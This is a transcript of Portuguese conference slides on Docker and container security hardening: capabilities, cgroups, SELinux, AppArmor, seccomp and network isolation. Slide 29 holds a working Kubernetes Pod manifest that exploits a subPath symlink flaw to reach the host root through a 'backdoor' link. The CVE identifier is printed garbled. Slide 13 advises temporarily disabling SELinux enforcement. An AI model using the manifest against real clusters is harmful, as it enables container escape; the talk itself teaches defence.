Segurança em Containers

Transcript

1. Globalcode – Open4education Segurança em Containers Guilherme Oki

2. Globalcode – Open4education Quem sou eu? • Tech lead na

   Stone Pagamentos • Defensor do open source • Entusiasta da cultura e do desenvolvimento ágil • Apaixonado pela cultura devops • Buscando aprender mais de segurança

3. Globalcode – Open4education Livros que estou lendo... @guilhermeoki

4. Globalcode – Open4education O que é Docker? "Docker is about

   running random crap from the internet as root on your host"

5. Globalcode – Open4education O que são containers? “CONTAINERS ARE NOT

   A REAL THING” - Jess Frazelle Cgroups Namespaces Filesystem Virtual Machine Containers First Class Objects

6. Globalcode – Open4education O que são containers?

7. Globalcode – Open4education Como funciona? int flags = CLONE_NEWNS |

   CLONE_NEWCGROUP | CLONE_NEWPID | CLONE_NEWIPC | CLONE_NEWNET | CLONE_NEWUTS; child_pid = clone(child, stack + STACK_SIZE, flags | SIGCHLD, &config); Namespaces PID UTS IPC NET MNT

8. Globalcode – Open4education O que são imagens?

9. Globalcode – Open4education Por que eles precisam de proteção?

10. Globalcode – Open4education O que precisa de proteção? • Application

    • Containers <-> Containers • Containers <-> Hosts

11. Globalcode – Open4education Como proteger?

12. Globalcode – Open4education Capabilities • Capabilities foram adicionadas no kernel

    há 15 anos atrás. • Tenta dividir o poder de root • Lista atuais capabilities no Docker • getpcaps <pid> • Algumas capabilities • chown • kill • setuid • dac_override • Enabled by default "nothing should need this. If your container need this, it's probably doing something horrible." Steve Grubb, security expert at Red Hat

13. Globalcode – Open4education O que eu preciso realmente preciso? •

    Entre em modo permissivo • setsebool virt_sandbox_use_all_caps=0 • setenforce 0 • Execute seu container com todas as caps. • docker run --cap-add all IMAGE ... • Isto irá gerar uma mensagem sobre as capabilities usadas • grep capability /var/log/audit/audit.log "type=AVC msg=audit(1495655327.756:44343): avc: denied { syslog } for pid=5246 comm="rsyslogd" capability=34 scontext=system_u:system_r:container_t:s0:c795,c887 tcontext=system_u:system_r:container_t:s0:c795,c887 tclass=capability2 " • cap_name[31]="cap_setfcap" • cap_name[32]="cap_mac_override" • cap_name[33]="cap_mac_admin" • cap_name[34]="cap_syslog"

14. Globalcode – Open4education Limite o recurso disponível • Recurso do

    cgroups • Memory • --memory • Swap • --memory-swap • CPU • --cpu-shares • DISK I/O • --device-read-iops • --device-write-iops

15. Globalcode – Open4education Linux Security Modules

16. Globalcode – Open4education SELinux

17. Globalcode – Open4education SELinux • Type Enforcement e Multi Category

    Security ( MCS ) • sandbox_lxc_process = "system_u:system_r:container_t:s0" • cada container s0:c1, s0:c2, … • Adicione este parâmetro no docker daemon para habilitar o SELinux • --selinux-enabled

18. Globalcode – Open4education AppArmor • Profile padrão é o docker-default

    • Para carregar o profile padrão • --security-opt apparmor=docker-default • Você pode gerenciar syscalls, capabilities e paths • Você pode utilizar um gerador de profiles • https://github.com/jessfraz/bane

19. Globalcode – Open4education Seccomp • Docker tem um profile padrão

    para seccomp • Adicione este parâmetro para usar um custom profile • --security-opt seccomp:custom.json { "defaultAction": "SCMP_ACT_ALLOW", "syscalls": [ { "name": "chown", "action": "SCMP_ACT_ERRNO" }, { "name": "chmod", "action": "SCMP_ACT_ERRNO" } ] }

20. Globalcode – Open4education Como funciona uid/gid?

21. Globalcode – Open4education Read only images • Para twelve factor

    apps • docker run --read-only IMAGE

22. Globalcode – Open4education Limpe seus container • Dockerfile ◦ RUN

    for i in `find / -not \( -path /proc -prune \) -perm +6000 -type f`; chmod a-s $i; done

23. Globalcode – Open4education Escaneie seus containers

24. Globalcode – Open4education Assine sua imagem

25. Globalcode – Open4education Container network “Docker networking is Linux networking”

    - Docker docs iptables bridges veths network ns

26. Globalcode – Open4education Proteja sua rede • set --icc=false (desabilita

    inter container communication) • By pass https://github.com/brthor/docker-layer2-icc • Use uma SDN por favor :)

27. Globalcode – Open4education OVN (Open Virtual Network)

28. Globalcode – Open4education CVE-201701002101 • Um dos maiores bugs já

    vistos no kubernetes • Fácil de reproduzir • Versões impactadas ◦ 1.3.x-1.6.x ◦ 1.7.0-1.7.13 ◦ 1.8.0-1.8.8 ◦ 1.9.0-1.9.3

29. Globalcode – Open4education CVE-201701002101 apiVersion: v1 kind: Pod metadata: name:

    my-pod spec: initContainers: - name: prep-symlink image: "busybox" command: ["bin/sh", "-ec", "ln -s / /mnt/data/backdoor"] volumeMounts: - name: volume mountPath: /mnt/data containers: - name: my-container image: "busybox" command: ["/bin/sh", "-ec", "ls /mnt/data; sleep 999999"] volumeMounts: - mountPath: /mnt/data name: volume subPath: backdoor volumes: - name: volume emptyDir: {}

30. Globalcode – Open4education Futuro - Rootless containers • Runc executando

    como usuário não-privilegiado • Alguns problemas com cgroups • Alguns problemas com host network

31. Globalcode – Open4education Futuro - Virtualização • Pula diretamente para

    o Kernel Linux usando kvmtool • In-place Kernel Load • Suporte para Docker Containers • Boot em 0.2 seconds • Slim Kernel

32. Globalcode – Open4education Dúvidas?

33. Globalcode – Open4education Obrigado! :-)

34. None